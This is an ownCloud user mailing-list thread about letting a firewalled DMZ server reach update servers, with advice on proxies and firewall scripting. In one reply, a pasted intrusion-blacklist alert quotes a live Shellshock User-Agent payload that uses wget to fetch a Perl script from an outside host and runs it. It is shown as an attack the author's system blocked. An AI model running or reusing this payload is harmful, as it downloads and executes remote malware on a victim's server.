IP addresses of owncloud servers (owncloud.org)

Previous Topic Next Topic
 
classic Classic list List threaded Threaded
8 messages Options
Reply | Threaded
Open this post in threaded view
|

IP addresses of owncloud servers (owncloud.org)

Michal Vymazal
Hello

I'm supervising one owncloud server installation inside a DMZ zone with
IP private adresses.

Means, the owncloud can contact the internet space only through a
firewall rule which needs the public IP adress of server, which will be
contacted.

And here is my problem, I can't find on the owncloud.org any list of IP
addresses of the ownloud.org servers.

I found only this

www.owncloud.org
50.30.33.236

apps.owncloud.org
50.30.41.105

www.owncloud.com
50.30.33.235

apps.owncloud.com
74.208.110.124


But, this servers are not enough. The update advice (about new owncloud
releases) is not working and I can't update applications too.

Can you help me and reveal the IP addresses of the rest of internet
owncloud servers needed?

Thanks
Michal

--
Ing. Michal Vymazal
Linux Services
CEO
[hidden email]

www.linuxservices.cz
Portable Computer

This mail can't contain any virus.
I'm using only Open Source software.
_______________________________________________
User mailing list
[hidden email]
http://mailman.owncloud.org/mailman/listinfo/user
Reply | Threaded
Open this post in threaded view
|

Re: IP addresses of owncloud servers (owncloud.org)

Stefan Schwarz
Owncloud does not provide you with a dyndns-service which could list
your server.

You need to
- create your own DNS-Entry with the static IP of your Internet-Uplink
(if you have one)
- or use one of the dynDNS-services which give you a DNS-Name for your
(changing) dynamic IP. maybe create a CNAME-Alias to it, so it matches a
more friendly name.

Of course you need a working NAT/port-forwarding-setup (SSL-Port 443 ->
privateIP:443), if your public IP is changing its not wise to include it
in a firewall-rule.

greetings
Stefan


Am 30.05.2016 um 14:16 schrieb Michal Vymazal:

> Hello
>
> I'm supervising one owncloud server installation inside a DMZ zone with
> IP private adresses.
>
> Means, the owncloud can contact the internet space only through a
> firewall rule which needs the public IP adress of server, which will be
> contacted.
>
> And here is my problem, I can't find on the owncloud.org any list of IP
> addresses of the ownloud.org servers.
>
> I found only this
>
> www.owncloud.org
> 50.30.33.236
>
> apps.owncloud.org
> 50.30.41.105
>
> www.owncloud.com
> 50.30.33.235
>
> apps.owncloud.com
> 74.208.110.124
>
>
> But, this servers are not enough. The update advice (about new owncloud
> releases) is not working and I can't update applications too.
>
> Can you help me and reveal the IP addresses of the rest of internet
> owncloud servers needed?
>
> Thanks
> Michal
>

_______________________________________________
User mailing list
[hidden email]
http://mailman.owncloud.org/mailman/listinfo/user
Reply | Threaded
Open this post in threaded view
|

Re: IP addresses of owncloud servers (owncloud.org)

Alvar Freude
Am 2016-05-30 18:11, schrieb Stefan Schwarz:
> Owncloud does not provide you with a dyndns-service which could list
> your server.

He has an other problem: his internal OwnCloud server should contact
the outside Owncloud update servers, but outgoing connections are
firewalled. He does not use, as far as i understand, a home server with
DynDNS. In contrast to many PHP-installations, he blocks outging traffic
on purpose.

This is a good idea. A very good idea.


But AFAIK it is not guaranteed, which server/IP OwnCloud contacts for
updating etc. Some apps may contact their own server, the core contacts
some AWS IPs, which may change?

Because of this, I use a proxy. Owncloud itself is here in a FreeBSD
Jail with private IP on private interface lo23, but with the correct
proxy setting it can connect everywhere. This is not a very good config,
because security by obscurity – but better then nothing (a typical
script kiddie attacker who 0wned my OwnCloud would try to access outside
directly).


So, it would be a good idea, if OwnCloud defines fixed systems which
may be contacted by the Owncloud Core Appliaction and Apps by default.


Ciao
   Alvar

_______________________________________________
User mailing list
[hidden email]
http://mailman.owncloud.org/mailman/listinfo/user
Reply | Threaded
Open this post in threaded view
|

Re: IP addresses of owncloud servers (owncloud.org)

Andreas Hechenberger-2
Hey Alvar and rest,

i am not sure if it is a good idea to have fixed IP addresses because
this allows more attacks (spoofing etc.) and providers/companies etc.
could also slow down or worse block the traffic to those IP's.

it could be nice to have both ^^
@Michal write your own script which add/remove the IP's dynamical to
your firewall. i know its a hacky workaround but it could work ^^

Servus
Andy

On 05/30/2016 06:40 PM, Alvar Freude wrote:

> Am 2016-05-30 18:11, schrieb Stefan Schwarz:
>> Owncloud does not provide you with a dyndns-service which could list
>> your server.
>
> He has an other problem: his internal OwnCloud server should contact the
> outside Owncloud update servers, but outgoing connections are
> firewalled. He does not use, as far as i understand, a home server with
> DynDNS. In contrast to many PHP-installations, he blocks outging traffic
> on purpose.
>
> This is a good idea. A very good idea.
>
>
> But AFAIK it is not guaranteed, which server/IP OwnCloud contacts for
> updating etc. Some apps may contact their own server, the core contacts
> some AWS IPs, which may change?
>
> Because of this, I use a proxy. Owncloud itself is here in a FreeBSD
> Jail with private IP on private interface lo23, but with the correct
> proxy setting it can connect everywhere. This is not a very good config,
> because security by obscurity – but better then nothing (a typical
> script kiddie attacker who 0wned my OwnCloud would try to access outside
> directly).
>
>
> So, it would be a good idea, if OwnCloud defines fixed systems which may
> be contacted by the Owncloud Core Appliaction and Apps by default.
>
>
> Ciao
>   Alvar
>
> _______________________________________________
> User mailing list
> [hidden email]
> http://mailman.owncloud.org/mailman/listinfo/user
_______________________________________________
User mailing list
[hidden email]
http://mailman.owncloud.org/mailman/listinfo/user
Reply | Threaded
Open this post in threaded view
|

Re: IP addresses of owncloud servers (owncloud.org)

Joerg Mertin-2
IMHO - dynamic DNS is a lame excuse for security. You could just install
Windows + 2 AV and claim it is more secure (which is crap of course).

Static IP is Ok IMHO. What is required is for the system to have an active
defense, and that can only be achieved if the owncloud system has access to
the firewall somehow. Dynamic blacklisting by example.

A very simple approach by example would be to use the return codes of the
WebServer.
- 403 - access denied would mean someone is trying to access a resource
without proper permissions -> enter client-IP into a blacklist for 24Hours
- 404 - some is accessing a non-existing resource. This is typical for
resource probing (check  /admin/config.php  by example). If that file does not
exist, this is definitely a resource probing for a following attack.

That - is something websites should develop and include into their code.
I went even further on my site with that. Having also a dedicated access to my
firewall, I do not only block the client-IP, but also terminate all existing
connections at the same time.

I have of course a way more complex system setup - also based on URL
reputation. After the first attack that came in, the request-URL is store in a
DB, and based on if I have configured that URL to not lock the requester, the
first attempt will lock the client-IP hard immediately. Have an average of
4000 attack vectors (That's how I call these URL) per Year.
Look at the below attack attempt I had - the system has locked it down hard in
the attempt.


Dear Admin,

The following new blacklist entry has been submitted.
You might got to the Details page by following this link
https://stargate.solsys.org/admin.php?
op=blacklist&action=edit&position=0&blacklist=177.140.117.69

Blacklist Content
================================================================================

-> 2016-05-29 @ 14:35:47
Breaking attempt ?
Module/Function: core/error
User Agent: () { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo
333:; cd /tmp;wget http://www.saninji.jp/files/.config/b.txt;perl b.txt; rm -
rf b.txt; echo 333:; id;"
Referer:
Request: /cgi-bin/status/status.cgi
Firewall report:
  * Entered IP 177.140.117.69 into blacklist
   - Removed active connection *2CA02 [177.140.117.69:23309 ->
192.168.1.2:443]
   - Removed active connection *2CA0A [177.140.117.69:9920 -> 192.168.1.2:80]
   - Removed active connection *2CA0C [177.140.117.69:25142 ->
192.168.1.2:443]
   - Removed active connection *2CA2F [177.140.117.69:46762 -> 192.168.1.2:80]
   - Removed active connection *2CA30 [177.140.117.69:24306 ->
192.168.1.2:443]
   - Removed active connection *2CA3B [177.140.117.69:37394 ->
192.168.1.2:443]


I stopped putting systems I have not developed or at least thoroughly tested
myself directly onto the net. I still not trust owncloud enough to put it on
the net. No active defenses :}

On Tuesday, May 31, 2016 12:33:42 AM CEST Andreas Hechenberger wrote:

> Hey Alvar and rest,
>
> i am not sure if it is a good idea to have fixed IP addresses because
> this allows more attacks (spoofing etc.) and providers/companies etc.
> could also slow down or worse block the traffic to those IP's.
>
> it could be nice to have both ^^
> @Michal write your own script which add/remove the IP's dynamical to
> your firewall. i know its a hacky workaround but it could work ^^
>
> Servus
> Andy
>
> On 05/30/2016 06:40 PM, Alvar Freude wrote:
> > Am 2016-05-30 18:11, schrieb Stefan Schwarz:
> >> Owncloud does not provide you with a dyndns-service which could list
> >> your server.
> >
> > He has an other problem: his internal OwnCloud server should contact the
> > outside Owncloud update servers, but outgoing connections are
> > firewalled. He does not use, as far as i understand, a home server with
> > DynDNS. In contrast to many PHP-installations, he blocks outging traffic
> > on purpose.
> >
> > This is a good idea. A very good idea.
> >
> >
> > But AFAIK it is not guaranteed, which server/IP OwnCloud contacts for
> > updating etc. Some apps may contact their own server, the core contacts
> > some AWS IPs, which may change?
> >
> > Because of this, I use a proxy. Owncloud itself is here in a FreeBSD
> > Jail with private IP on private interface lo23, but with the correct
> > proxy setting it can connect everywhere. This is not a very good config,
> > because security by obscurity – but better then nothing (a typical
> > script kiddie attacker who 0wned my OwnCloud would try to access outside
> > directly).
> >
> >
> > So, it would be a good idea, if OwnCloud defines fixed systems which may
> > be contacted by the Owncloud Core Appliaction and Apps by default.
> >
> >
> > Ciao
> >
> >   Alvar



--
Stop searching forever.  Happiness is just next to you.
------------------------------------------------------------------------
Joerg Mertin in Clermont/France
Web: http://www.solsys.org - Linux user #172509
PGP: Public Key Server - Get "0x159DC660F946126F"

_______________________________________________
User mailing list
[hidden email]
http://mailman.owncloud.org/mailman/listinfo/user
Reply | Threaded
Open this post in threaded view
|

Re: IP addresses of owncloud servers (owncloud.org)

Michal Vymazal
In reply to this post by Michal Vymazal
Hi all

> i am not sure if it is a good idea to have fixed IP addresses because
> this allows more attacks (spoofing etc.) and providers/companies etc.
> could also slow down or worse block the traffic to those IP's.
>
> it could be nice to have both ^^
> @Michal write your own script which add/remove the IP's dynamical to
> your firewall. i know its a hacky workaround but it could work ^^

Well, this solution need a good described implementation scenario, but
the idea with owncloud proxy looks good.

But, at this moment. Does anybody know the easiest way to reveal all the
public IP addresses of owncloud and application servers needed to
upgrade the owncloud code and the applications code?

One suggestion - is it possible to enhance the owncloud and the apps
code which a little bit line which will advice the server name, which
the owncloud or application code will connect to obtain the upgrade?

Best regards
Michal


--
Ing. Michal Vymazal
Linux Services
CEO
[hidden email]

www.linuxservices.cz
Portable Computer

This mail can't contain any virus.
I'm using only Open Source software.
_______________________________________________
User mailing list
[hidden email]
http://mailman.owncloud.org/mailman/listinfo/user
Reply | Threaded
Open this post in threaded view
|

Re: IP addresses of owncloud servers (owncloud.org)

Chris-3
CONTENTS DELETED
The author has deleted this message.
Reply | Threaded
Open this post in threaded view
|

Re: IP addresses of owncloud servers (owncloud.org)

Chris-3
CONTENTS DELETED
The author has deleted this message.